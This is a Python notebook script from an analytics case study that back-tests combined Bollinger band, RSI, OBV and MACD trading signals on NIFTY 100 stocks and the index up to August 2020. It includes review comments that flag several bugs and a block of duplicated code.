# Bollinger says "Buy" but RSI is negative; otherwise WAIT.
df1_grouped = daily_data_back_test.groupby('Symbol')
COMBINED = [0]  # dummy seed; the first element is stripped off after the loop
for group_keys, df_group in df1_grouped:
    i = 0
    for row_index, row in df_group.iterrows():
        # NOTE(review): counter i vs index label df_group.index[-1] -- assumes
        # a 0..N-1 RangeIndex per group, confirm upstream reset_index.
        if i <= df_group.index[-1] :
            if i == 0 :
                COMBINED.append("WAIT")
            else:
                if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                    if df_group.loc[row_index, 'TradingStrategyRSI'] == "positive":
                        COMBINED.append("ENTER")
                    else:
                        COMBINED.append("SELL")
                else:
                    COMBINED.append("WAIT")
        i = i + 1
# +
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_back_test['TradingStrategyCombined_bol_rsi'] = dataframe_COMBINED_corrected['COMBINED'].values
# +
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Per symbol: buy the largest whole number of shares on ENTER, liquidate on
# SELL; each transaction appended flat (5 fields) to Back_Test_10yrs_r.
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # for each group_key or Symbol
    j = 0 # counts transactions recorded for this symbol
    number_stock = 0
    money = 10000 # per-stock cash pot; comment elsewhere says "10 lakhs", results appear scaled x100 later -- confirm
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi'] == "SELL":
                    Back_Test_10yrs_r.append(row['Date'])
                    Back_Test_10yrs_r.append(row['Symbol'])
                    Back_Test_10yrs_r.append("Sell")
                    Back_Test_10yrs_r.append(row['Close'])
                    Back_Test_10yrs_r.append(number_stock)
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi'] == "ENTER":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Buy")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
        i = i + 1
# +
# Settle the Bollinger+RSI(>50) back-test: frame the flat transaction list,
# synthesize closing Sells (priced at the 2020-08-28 close) for positions
# still open, consolidate per symbol, and report.
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)]
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        # Symbol changed while the previous symbol's last txn was a Buy:
        # emit a synthetic closing Sell at the 2020-08-28 close.
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    # Very last transaction row is still a Buy: close it out the same way.
    if ((i == row_count) and (row['Txn'] == "Buy")):
        date = "2020-08-28"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
# NOTE(review): this is a Series; assigning .columns has no renaming effect.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, RSI", "Bollinger Middle Band; RSI > 50", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
# number of positives we got is 51 out of 100 (no where close to 66% thats expected)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger RSI 50 Buy_Sell list.csv')
# +
# Lets try with Bolling and RSI but with RSI > 25
# determine the trading strategy for RSI
# RSI reading above the 25 level is considered as a positive momentum
# RSI reading below the 25 level is considered negative momentum
daily_data_back_test['TradingStrategyRSI_revised'] = np.where(daily_data_back_test['rsi'] > 25, "positive", "negative")
# REMOVE THE EFFECT OF OBV AND SEE IF WE GET A POSITIVE WAY FORWARD - SO JUST BOLLING AND RSI (with RSI > 25 for Buy call)
df1_grouped = daily_data_back_test.groupby('Symbol')
COMBINED = [0]  # dummy seed; the first element is stripped off after the loop
for group_keys, df_group in df1_grouped:
    i = 0
    for row_index, row in df_group.iterrows():
        # NOTE(review): counter i vs index label df_group.index[-1] -- assumes
        # a 0..N-1 RangeIndex per group, confirm upstream reset_index.
        if i <= df_group.index[-1] :
            if i == 0 :
                COMBINED.append("WAIT")
            else:
                if df_group.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                    if df_group.loc[row_index, 'TradingStrategyRSI_revised'] == "positive":
                        COMBINED.append("ENTER")
                    else:
                        COMBINED.append("SELL")
                else:
                    COMBINED.append("WAIT")
        i = i + 1
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_data_back_test['TradingStrategyCombined_bol_rsi_revised'] = dataframe_COMBINED_corrected['COMBINED'].values
# REVISION5 BASED ON BACK-TESTING FOR COMBINED STRATEGY
# BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Per symbol: buy the largest whole number of shares on ENTER, liquidate on
# SELL; each transaction appended flat (5 fields) to Back_Test_10yrs_r.
df1_grouped = daily_data_back_test.groupby('Symbol')
Back_Test_10yrs_r = []
for group_keys, df_group in df1_grouped:
    i = 0 # for each group_key or Symbol
    j = 0 # counts transactions recorded for this symbol
    number_stock = 0
    money = 10000 # per-stock cash pot; comment elsewhere says "10 lakhs", results appear scaled x100 later -- confirm
    next_step = 1 # 1 - Buy, 0 - Sell
    for row_index, row in df_group.iterrows():
        if i <= df_group.index[-1] :
            if next_step == 0:
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "SELL":
                    Back_Test_10yrs_r.append(row['Date'])
                    Back_Test_10yrs_r.append(row['Symbol'])
                    Back_Test_10yrs_r.append("Sell")
                    Back_Test_10yrs_r.append(row['Close'])
                    Back_Test_10yrs_r.append(number_stock)
                    money = money + row['Close'] * number_stock
                    next_step = 1
                    j = j + 1
            else: # first time I have to buy
                if df_group.loc[row_index, 'TradingStrategyCombined_bol_rsi_revised'] == "ENTER":
                    number_stock = money // row['Close'] # floor division to get the integer number of stocks
                    if number_stock > 0:
                        Back_Test_10yrs_r.append(row['Date'])
                        Back_Test_10yrs_r.append(row['Symbol'])
                        Back_Test_10yrs_r.append("Buy")
                        Back_Test_10yrs_r.append(row['Close'])
                        Back_Test_10yrs_r.append(number_stock)
                        money = money - row['Close'] * number_stock
                        next_step = 0
                        j = j + 1
        i = i + 1
# Settle the Bollinger+RSI(>25) back-test: frame the flat transaction list,
# synthesize closing Sells (priced at the 2020-08-28 close) for positions
# still open, and consolidate per symbol.
# Split the consolidate list into multiple lists with 5 columns each for the list row
n = 5
Buy_Sell_list_r = list(divide_chunks(Back_Test_10yrs_r, n))
# delete the dataframe since its used across multiple times
del Buy_Sell_dataframe_r
del concat_Buy_Sell
# move to dataframe
Buy_Sell_dataframe_r = []
Buy_Sell_dataframe_r = pd.DataFrame(Buy_Sell_list_r)
Buy_Sell_dataframe_r.columns = ['Date', 'Symbol', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe_r ['Value'] = Buy_Sell_dataframe_r ['Price'] * Buy_Sell_dataframe_r ['Qty']
#Buy_Sell_dataframe_dup = Buy_Sell_dataframe_r[Buy_Sell_dataframe_r.duplicated(['Symbol', 'Txn', 'Qty'], keep=False)] #to get only duplicated rows
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        # Symbol changed while the previous symbol's last txn was a Buy:
        # emit a synthetic closing Sell at the 2020-08-28 close.
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    # Very last transaction row is still a Buy: close it out the same way.
    if ((i == row_count) and (row['Txn'] == "Buy")):
        date = "2020-08-28"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# add the rows to dataframe which are in Buy position but have not been sold.
n = 6
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Symbol', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Symbol Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe_r, add_rows_df])
concat_Buy_Sell.shape
# Consolidate the Value of txn by Symbol
Buy_Sell_Consolidated_r = []
Buy_Sell_Consolidated_r = concat_Buy_Sell.groupby(['Symbol', 'Txn'])['Value'].sum()
# rename the coumn headers
# NOTE(review): this is a Series; assigning .columns has no renaming effect.
Buy_Sell_Consolidated_r.columns = ['Symbol', 'Txn', 'Cum Value']
Buy_Sell_Consolidated_r
# Sumarize in a dataframe
Buy_Sell_Summary_r = pd.DataFrame(Buy_Sell_Consolidated_r.groupby(level=0).diff().mul(100).dropna().reset_index(drop=True, level=1))
# -
# NOTE(review): this cell repeats the "close out open Buy positions" pass
# that already ran in the settlement cell above; add_rows_list is rebuilt
# here but never consumed afterwards in this section, so it looks like
# leftover duplicate (dead) code -- candidate for deletion once confirmed
# nothing downstream reads add_rows_list / last_* / price / value.
i = 0
add_rows_list=[]
row_count = Buy_Sell_dataframe_r.shape[0]
for index_row, row in Buy_Sell_dataframe_r.iterrows():
    if i == 0:
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        last_txn = row['Txn']
        i = i + 1
    else:
        # Symbol changed while the previous symbol's last txn was a Buy:
        # emit a synthetic closing Sell at the 2020-08-28 close.
        if ((row['Symbol'] != last_symbol) & (last_txn == "Buy")):
            date = "2020-08-28"
            add_rows_list.append(date) # Date
            add_rows_list.append(last_symbol) # Symbol
            add_rows_list.append("Sell") # Sell
            price = daily_data_back_test[(daily_data_back_test['Symbol'] == last_symbol) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
            add_rows_list.append(price) # Close price per the last date for that stock
            add_rows_list.append(last_qty) # qty
            value = price * last_qty
            add_rows_list.append(value)
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
        else:
            last_txn = row['Txn']
            last_symbol = row['Symbol']
            last_qty = row['Qty']
            i = i + 1
    # Very last transaction row is still a Buy: close it out the same way.
    if ((i == row_count) and (row['Txn'] == "Buy")):
        date = "2020-08-28"
        add_rows_list.append(date) # Date
        add_rows_list.append(row['Symbol']) # Symbol
        add_rows_list.append("Sell") # Sell
        price = daily_data_back_test[(daily_data_back_test['Symbol'] == row['Symbol']) & (daily_data_back_test['Date'] == date)]['Close'].values[0]
        add_rows_list.append(price) # Close price per the last date for that stock
        add_rows_list.append(row['Qty']) # qty
        value = price * row['Qty']
        add_rows_list.append(value)
        last_txn = row['Txn']
        last_symbol = row['Symbol']
        last_qty = row['Qty']
        i = i + 1
# # SUMMARIZING THE VARIOUS STRATEGIES FOR STOCKS
# Append the Bollinger+RSI(>25) result to the running report frames and dump
# the transaction ledger to CSV.
# find the number of positive values of the 100 stocks
#Buy_Sell_Summary_r['Value'].gt(0).sum().sum()
#Buy_Sell_Summary_r['Value'].sum()
investment = 1000000
# NOTE(review): investment is not passed to Summarize_Report; presumably the
# helper reads it as a module-level global -- verify against its definition.
temp1_df, temp2_df = Summarize_Report("Stock", "Bollinger, RSI", "Bollinger Middle Band; RSI > 25", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Bollinger RSI 25 Buy_Sell list.csv')
# # NIFTY READ & CALCULATE THE RETURNS OVER THE INVESTMENT
# +
########### NIFTY READ
# -
# PERFORM THE DATA ANALYSIS FOR NIFTY - FROM START UNTIL 31-AUG-2020 AND THEN COMPARE THE RETURNS WITH NIFTY AND WHATS IN MY STRATEGY
# Load the NIFTY 100 index history and extend it with the Oct/Nov-2020 file.
raw_daily_nifty100 = pd.read_excel(r"D:\Personal\Analytics course\IPBA\Case Study\hundred\Index_NIFTY 100.xlsx")
raw_daily_nifty100
# #### Read the additional Nifty data for Oct and Nov 2020
raw_daily_nifty100_oct_nov = pd.read_excel(r"D:\Personal\Analytics course\IPBA\Case Study\additional data\Index_NIFTY 100.xlsx")
raw_daily_nifty100_oct_nov['Date']
# drop the overlapping 01-Oct-2020 row so the two frames can be appended without duplicates
raw_daily_nifty100_oct_nov_corrected = raw_daily_nifty100_oct_nov[raw_daily_nifty100_oct_nov['Date'] > "2020-10-01"]
raw_daily_nifty100_oct_nov_corrected.head(10)
# append the oct_nov 2020 data into the existing index data
# NOTE(review): DataFrame.append is deprecated in modern pandas; pd.concat is
# the replacement if this notebook is ever upgraded.
temp_df = raw_daily_nifty100
daily_nifty100 = pd.DataFrame(temp_df.append(raw_daily_nifty100_oct_nov_corrected, ignore_index = True))
daily_nifty100.shape
daily_nifty100.isnull().sum()
# +
# Technical indicators for the NIFTY 100 index: SMAs, EMAs, RSI(14),
# MACD(12,26) with 9-day signal, Bollinger(20, 2 sigma) and OBV.
# All columns are added to daily_nifty100 in place; order matters below.
# to calculate the simple moving average - 5, 10 , 50, 100, 200 days
daily_nifty100['SMA-5'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=5).mean())
daily_nifty100['SMA-10'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=10).mean())
daily_nifty100['SMA-50'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=50).mean())
daily_nifty100['SMA-100'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=100).mean())
daily_nifty100['SMA-200'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=200).mean())
# to calculate the exponential moving average - 5, 10 , 50, 100, 200 days
daily_nifty100['EMA-5'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=5).mean())
daily_nifty100['EMA-10'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=10).mean())
daily_nifty100['EMA-50'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=50).mean())
daily_nifty100['EMA-100'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=100).mean())
daily_nifty100['EMA-200'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=200).mean())
# calculate RSI - Relative Strength Index over a 14-day simple average of gains/losses
change = daily_nifty100['Close'].transform(lambda x:x.diff())
gain = change.mask(change < 0, 0)
loss = change.mask (change > 0, 0)
average_gain= gain.rolling(window = 14).mean().shift()
average_loss= loss.rolling(window = 14).mean().shift()
relativestrength = abs(average_gain / average_loss)
rsi = 100 - (100/(1+relativestrength))
daily_nifty100['rsi'] = rsi.shift(-1) # move up since the current column is already on next row due to rolling function
# calculate MACD
# MACD = 12-day EMA - 26-day EMA
daily_nifty100['ema12'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=12).mean())
daily_nifty100['ema26'] = daily_nifty100['Close'].transform(lambda x:x.ewm(span=26).mean())
daily_nifty100['macd'] = daily_nifty100['ema12'] - daily_nifty100['ema26']
## for cross over - calculate macd9 (the 9-day signal line of the MACD)
daily_nifty100['macd9'] = daily_nifty100['macd'].transform(lambda x:x.ewm(span=9).mean())
# calculate bollinger band (20-day SMA +/- 2 standard deviations)
daily_nifty100['SMA-20'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=20).mean())
daily_nifty100['stddev-20'] = daily_nifty100['Close'].transform(lambda x:x.rolling(window=20).std())
daily_nifty100['Bollinger-UpperBand'] = daily_nifty100['SMA-20'] + 2*daily_nifty100['stddev-20']
daily_nifty100['Bollinger-LowerBand'] = daily_nifty100['SMA-20'] - 2*daily_nifty100['stddev-20']
# Calculate the OBV - based on price change, denote whether the volume needs to be added or subtracted in a new column - store it as list in OBV
# NOTE(review): `row_index - 1` assumes a contiguous RangeIndex on df_nifty -- confirm.
df_nifty = daily_nifty100
i = 0
OBV = [0]
for row_index, row in df_nifty.iterrows():
    if i <= df_nifty.index[-1] :
        if i == 0 :
            OBV.append(df_nifty.loc[row_index, 'Volume'])
        else :
            if df_nifty.loc[row_index, 'Close'] > df_nifty.loc[row_index - 1, 'Close'] :
                OBV.append(df_nifty.loc[row_index, 'Volume'])
            if df_nifty.loc[row_index, 'Close'] == df_nifty.loc[row_index - 1, 'Close'] :
                OBV.append(0)
            if df_nifty.loc[row_index, 'Close'] < df_nifty.loc[row_index - 1, 'Close'] :
                OBV.append(-df_nifty.loc[row_index, 'Volume'])
        i = i + 1
# convert the series to dataframe with column as OBV
dataframe_OBV = pd.DataFrame(OBV,columns=['OBV'])
dataframe_OBV
# remove the first row since the append was started with OBV[0] - this way this would align to the length of the original dataframe
dataframe_OBV_corrected = dataframe_OBV[1:]
dataframe_OBV_corrected.tail()
# add the non-cumulative OBV value to the existing daily_data dataframe
daily_nifty100['OBV Non-Cum'] = dataframe_OBV_corrected['OBV'].values
# cumulative sum of the signed volumes gives the running OBV for the index
daily_nifty100['OBV'] = daily_nifty100['OBV Non-Cum'].cumsum()
daily_nifty100.head(20)
# -
daily_nifty100.isnull().sum()
# +
# Derive per-day Buy/Sell signals for each indicator on the NIFTY frame.
# determine Bearish or Bullish market and the trade strategy based on macd and macd9
# if macd > macd9, "bullish" and "buy"
# if macd < macd9, "bearish" and "sell"
daily_nifty100['TradingStrategymacd'] = np.where(daily_nifty100['macd'] > daily_nifty100['macd9'], "Buy", "Sell")
# determine the trading strategy for Bollinger
# Buy - first trade confirmation we need is for the price to break and close above the middle Bollinger band
# Sell - Close price drops from a Buy region of y/day to below the middle Bollinger band
daily_nifty100['TradingStrategyBollinger'] = np.where(daily_nifty100['Close'] >= daily_nifty100['SMA-20'], "Buy", "Sell")
# determine the trading strategy for RSI
# RSI reading above the 50 level is considered as a positive momentum
# RSI reading below the 50 level is considered negative momentum
daily_nifty100['TradingStrategyRSI'] = np.where(daily_nifty100['rsi'] > 50, "positive", "negative")
# determine the trading strategy for OBV
# Buy at the market once you see volume confirming the price (OBV rising and positive)
daily_nifty100['TradingStrategyOBV'] = np.where((daily_nifty100['OBV'] > daily_nifty100['OBV'].shift(1)) & (daily_nifty100['OBV'] > 0), "Buy", "Sell")
# +
# HIDE THE PROTECTIVE STOP LOSS BELOW THE BOLLINGER BAND
# The logical place to hide your protective stop loss is below the lower Bollinger band.
# A break below the lower BB will invalidate our trade idea, and we want to minimize our losses.
# STRATEGY FOR EXIT FROM THE MARKET (MAKE A SELL DECISION)
# A break below the lower Bollinger Band is a good signal for a possible reversal, so cash out profits
daily_nifty100['STOP'] = np.where((daily_nifty100['Close'] < daily_nifty100['Bollinger-LowerBand']), "STOP", "WAIT")
# +
# COMBINED STRATEGY TO ENTER THE MARKET (MAKE A BUY DECISION)
# Step #1: Price needs to Break and Close above the middle Bollinger Band
# Step #2: Wait for the RSI indicator to trade above the 50 level if it doesn’t already
# Step #3: Wait for the OBV indicator to rise. Buy at the market once you see volume confirming the price
# HIDE THE PROTECTIVE STOP LOSS BELOW THE BOLLINGER BAND
# The logical place to hide your protective stop loss is below the lower Bollinger band.
# A break below the lower BB will invalidate our trade idea, and we want to minimize our losses.
# STRATEGY FOR EXIT FROM THE MARKET (MAKE A SELL DECISION)
# A break below the lower Bollinger Band is a good signal for a possible reversal, so we want to cash out our profits
# Labels each day ENTER / SELL / WAIT; first day is always WAIT.
df_nifty = daily_nifty100
COMBINED = [0]
i = 0
for row_index, row in df_nifty.iterrows():
    if i <= df_nifty.index[-1] :
        if i == 0 :
            COMBINED.append("WAIT")
        else:
            if df_nifty.loc[row_index, 'TradingStrategyBollinger'] == "Buy":
                if df_nifty.loc[row_index, 'TradingStrategyRSI'] == "positive":
                    if df_nifty.loc[row_index, 'TradingStrategyOBV'] == "Buy":
                        COMBINED.append("ENTER")
                    else:
                        COMBINED.append("SELL")
                else:
                    COMBINED.append("SELL")
            else:
                COMBINED.append("WAIT")
        i = i + 1
# convert the series to dataframe with column as COMBINED
dataframe_COMBINED = pd.DataFrame(COMBINED,columns=['COMBINED'])
dataframe_COMBINED
# remove the first row since the append was started with COMBINED[0] - this way this would align to the length of the original dataframe
dataframe_COMBINED_corrected = dataframe_COMBINED[1:]
dataframe_COMBINED_corrected.tail()
# add the Combined Strategy value to the existing daily_data dataframe
daily_nifty100['TradingStrategyCombined'] = dataframe_COMBINED_corrected['COMBINED'].values
# -
# # BACK-TESTING FOR NIFTY UNTIL 28-AUG-2020 (10 YEARS)
## FOR BACK-TESTING FOR THE PERIOD FROM START UNTIL 31-AUG-2020
## SELECT THE DAILY_DATA TO REFLECT JUST THIS DATA AND NOT THE DATA FROM 01-SEP-2020
mask = (daily_nifty100['Date'] <= "2020-08-28")
daily_nifty_back_test = daily_nifty100[mask]
# BACK-TESTING FOR 10 YEARS - for nifty
# MACD - BUY & SELL Signal - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Alternating Buy/Sell state machine: next_step toggles so consecutive signals
# of the same kind are ignored.  Appends flat tuples of (Date, Txn, Price, Qty)
# to Back_Test_10yrs, chunked into rows later.
df_nifty = daily_nifty_back_test
Back_Test_10yrs = []
i = 0 # for each group_key or Symbol
j = 0 # for each row in the symbol
number_stock = 0
money = 1000000 # investment of 10 lakhs
next_step = 1 # 1 - Buy, 0 - Sell
for row_index, row in df_nifty.iterrows():
    if i <= df_nifty.index[-1] :
        if next_step == 0:
            if df_nifty.loc[row_index, 'TradingStrategymacd'] == "Sell":
                Back_Test_10yrs.append(row['Date'])
                Back_Test_10yrs.append("Sell")
                Back_Test_10yrs.append(row['Close'])
                Back_Test_10yrs.append(number_stock)
                money = money + row['Close'] * number_stock
                next_step = 1
                j = j + 1
        else: # first time I have to buy
            if df_nifty.loc[row_index, 'TradingStrategymacd'] == "Buy":
                number_stock = money // row['Close'] # floor division to get the integer number of stocks
                if number_stock > 0:
                    Back_Test_10yrs.append(row['Date'])
                    Back_Test_10yrs.append("Buy")
                    Back_Test_10yrs.append(row['Close'])
                    Back_Test_10yrs.append(number_stock)
                    money = money - row['Close'] * number_stock
                    next_step = 0
                    j = j + 1
        i = i + 1
# +
# Split the consolidated flat list into rows of 4 fields (Date, Txn, Price, Qty).
# NOTE(review): the original comment said "5 columns" but n = 4 here -- the
# Value column is computed afterwards, so 4 is correct for this ledger.
n = 4
Buy_Sell_list = list(divide_chunks(Back_Test_10yrs, n))
# move the list to dataframe
Buy_Sell_dataframe = []
Buy_Sell_dataframe = pd.DataFrame(Buy_Sell_list)
Buy_Sell_dataframe.columns = ['Date', 'Txn', 'Price', 'Qty']
# calculate the value
Buy_Sell_dataframe ['Value'] = Buy_Sell_dataframe ['Price'] * Buy_Sell_dataframe ['Qty']
# add the rows to dataframe which are in Buy position but have not been sold.
#Take the price as on 31st Aug as the price for back-testing
add_rows_list = []
i = 0
last_txn = Buy_Sell_dataframe.tail(1)['Txn']
last_qty = Buy_Sell_dataframe.tail(1)['Qty'].values[0]
if (last_txn == "Buy").bool():
    date = "2020-08-28"
    add_rows_list.append(date) # Date
    add_rows_list.append("Sell") # Sell
    price = daily_nifty_back_test[(daily_nifty_back_test['Date'] == date)]['Close'].values[0]
    add_rows_list.append(price) # Close price per the last date for that stock
    add_rows_list.append(last_qty) # qty
    value = price * last_qty
    add_rows_list.append(value)
# synthesized closing row(s) carry 5 fields, hence n = 5 here
n = 5
add_rows_split = list(divide_chunks(add_rows_list, n))
add_rows_df = pd.DataFrame(add_rows_split, columns=['Date', 'Txn', 'Price', 'Qty', 'Value'])
add_rows_df # Date Txn Price Qty
concat_Buy_Sell = pd.concat([Buy_Sell_dataframe, add_rows_df])
# -
Buy_Sell_dataframe.tail(1)['Qty'].values[0]
# Summarize the NIFTY 100 MACD(12,26)-9 back-test and export the ledger.
investment = 1000000
temp1_df, temp2_df = Summarize_Report("Nifty100", "macd", "(12-26)-9", concat_Buy_Sell)
Consolidated_Report_df = pd.concat([Consolidated_Report_df, temp1_df], ignore_index=True)
Summary_Report_df = pd.concat([Summary_Report_df, temp2_df], ignore_index=True)
Consolidated_Report_df.head(40)
Summary_Report_df.head(40)
concat_Buy_Sell.to_csv(r'D:\Personal\Analytics course\IPBA\Case Study\Output\Nifty100 MACD 1226 Buy_Sell list.csv')
# +
# BACK-TESTING FOR 10 YEARS - NIFTY
# RSI>25 and Bollinger - invest 10 lakhs when you get a Buy signal and take it out when you get a Sell signal
# Buy when Close >= SMA-20 AND rsi > 25; sell when Close < SMA-20 AND rsi <= 25.
